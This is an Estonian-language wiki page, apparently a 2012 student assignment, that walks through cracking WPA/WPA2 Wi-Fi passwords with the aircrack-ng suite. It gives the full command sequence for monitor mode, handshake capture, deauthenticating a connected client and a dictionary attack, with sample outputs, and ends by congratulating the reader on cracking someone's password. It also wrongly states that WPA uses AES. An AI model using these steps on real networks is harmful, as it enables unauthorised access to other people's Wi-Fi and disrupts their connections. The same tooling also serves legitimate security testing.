WPA kräkkimine

From ICO wiki
Revision as of 15:23, 9 November 2012 by Gratsep (talk | contribs)
Jump to navigationJump to search

Mis on WPA ja WPA2?

WPA (Wi-Fi Protected Access)- Andmeturbe protokoll Wi-Fi alliansilt IEEE 802.11 standardile vastavatele raadiokohtvõrkudele (Wi-Fi võrkudele). Siin kasutatakse TKIP (Temporal Key Integrity Protocol) protokolli, et tagada tugevamat krüpteerimist kui varasema WEP protokolli puhul (WEP kasutas RC4 algoritmi, kuid WPA kasutab AES algoritmi). WPA on tuletatud IEEE 802.11i andmeturbe standardist ning kasutab autentimiseks EAP protokolli.

WPA2 (Wireless Protected Access 2) - Traadita kohtvõrgu standardile IEEE 802.11i vastav andmeturbeprotokoll aastast 2004. On turvalisem kui vahepeal kasutatud WPA protokoll, sest kasutab krüpteerimiseks TKIP asemel märksa turvalisemat AES-põhist CCMP algoritmi. Alates 2006.a. peavad kõik Wi-Fi logoga varustatud seadmed toetama WPA2 andmeturvet.

Mis on WIFI?

Wi-Fi, WiFi (Wireless Fidelity) - Raadiokohtvõrk, raadio-Ethernet Wi-Fi on WECA (Wireless Ethernet Compatibility Alliance) poolt propageeritav kaubamärk, mis vastab raadiokohtvõrgu (WLAN) standardile IEEE 802.11. Tegemist on Etherneti protokolli kasutava kohtvõrguga, kus kaablid on asendatud raadiolinkidega. WiFi on ühilduv PC-kaartidega ja WiFi logot kandvate tugijaamadega Vahel kutsutakse raadiokohtvõrke ka "traadita Internetiks", kuigi tegelikult on ikkagi tegemist traadita kohtvõrkudega, mis võivad muidugi olla ühendatud ka Internetiga.

Kuidas kräkkida WPA'd lahti?

Punkt 1:

Käivita wifi liides/kaart "kuulaja režiimis".

Ava terminal ja kirjuta sinna käsk:

  • airmon-ng

On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:

Masinas millel on Ralink, Atheos ja Broadcom wifi kaart vastab terminal nii:

Interface Chipset Driver
rausb0     Ralink        RT73    rt73
wlan0       Broadcom b43 - [phy0]
wifi0         Atheros      madwifi-ng
ath0         Atheros       madwifi-ng VAP (parent: wifi0)

Peata ath0 kirjutades käsureale:

  • airmon-ng stop ath0


Interface      Chipset     Driver
wifi0             Atheros     madwifi-ng
ath0             Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Kirjuta käsureale:

  • iwconfig

Vastus peaks tulema umbes taoline:

lo no wireless extensions
eth0 no wireless extensions.
wifi0 no wireless extensions.

Kui peaks jutuma, et mõni athx veel töötab siis peata need käsitsi. Siis kontrolli uuesti tulemus iwconfig käsuga.

Nüüd lisa oma WIFI kaart 9. kanalisse käsuga:

  • airmon-ng start wifi0 9

Märkus: selles käsus kasutame "wifi0" "ath0" asemel kuna madwifi-ng draiverid on kasutusel.

Süsteem peaks vastama:

Interface Chipset Driver
wifi0       Atheros    madwifi-ng
ath0       Atheros     madwifi-ng VAP (parent: wifi0) (monitor mode enabled)


Näed, et "ath0" on määratud kuulamise reziimi.

Kontrolli, et kõik on õieti sisestades käsureale taas kord käsk iwconfig.

Süsteem peaks vastama:

lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Näed, et ath0 monitoorib/on kuulamise reziimis. 9's kanal asub 2.452GHz sagedusel. Pääsupunkt näitab MAC aadressi.  Soovituslik on üle kontrollida väljastatud informatsioon. Madwifi draiverid ja MAC  peavad olema ära märgitud pääsupunkti (Access Point) reale (teisi draivereid ei kuvata).

Et teada saada mis sagedusele vastab mingisugune kanal külasta seda lehte: . http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 .

Punkt 2:

Selle punkti mõte on siis jooksutada airodump-ng'd, et teada saada soovitud Access Pointi.

Kirjuta käsureale:

  • airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Tähtis on see, et EI TOHI kasutada --ivs'i käsus, kuna on oluline kõiki pakette püüda.

Näiteks tuleb väljund selline (eeldusel, et wifi klient on ühendatud võrku):

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

Kuna kuvati “WPA handshake: 00:14:6C:7E:40:80” siis see tähendab, et airodump-ng püüdis edukalt kinni the four-way handshake.

Selline näeb väljund välja kui EI OLE keegi wifisse ühendatud:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes

Punkt 3:

See punkt on valikuline ja väga suur abiline, kui sul pole kannatlikust oodata airdump-ng järgi.Eelmise punkti väljundist näed ära MAC aadressi. Kirjuta käsureale järgnev käsk:

  • aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Kui läheb hästi siis võib väljund olla selline:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

Punkt 4:

Selle punkti mõte on siis lahti murda WPA/WPA2. Selleks on sul vaja sõnastikku (password.lst).Võid ka oma sõnastikku kasutada. Põhimõtteliselt aircrack-ng proovib läbi kõik sõnad ja vaatab kas mõni neist sobib.

Ava uus käsurea aken ja lisa käsk:

  • aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Kui sa saad väljundiks "No valid WPA handshakes found." siis tee  läbi punkt 3 või varu kannatust ja proovi mingi aja tagant uuesti.

Kui aga kõik läks nii nagu pidi on väljundiks:

Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Palju õnne! Olen suutnud lahti kräkkida kellegi WIFI parooli. Troubleshootide juhendid leiad aadressil http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Kasutatud materjalid:

www.vallaste.ee

http://www.aircrack-ng.org/doku.php?id=cracking_wpa


Autor: Gertti-Vena Rätsep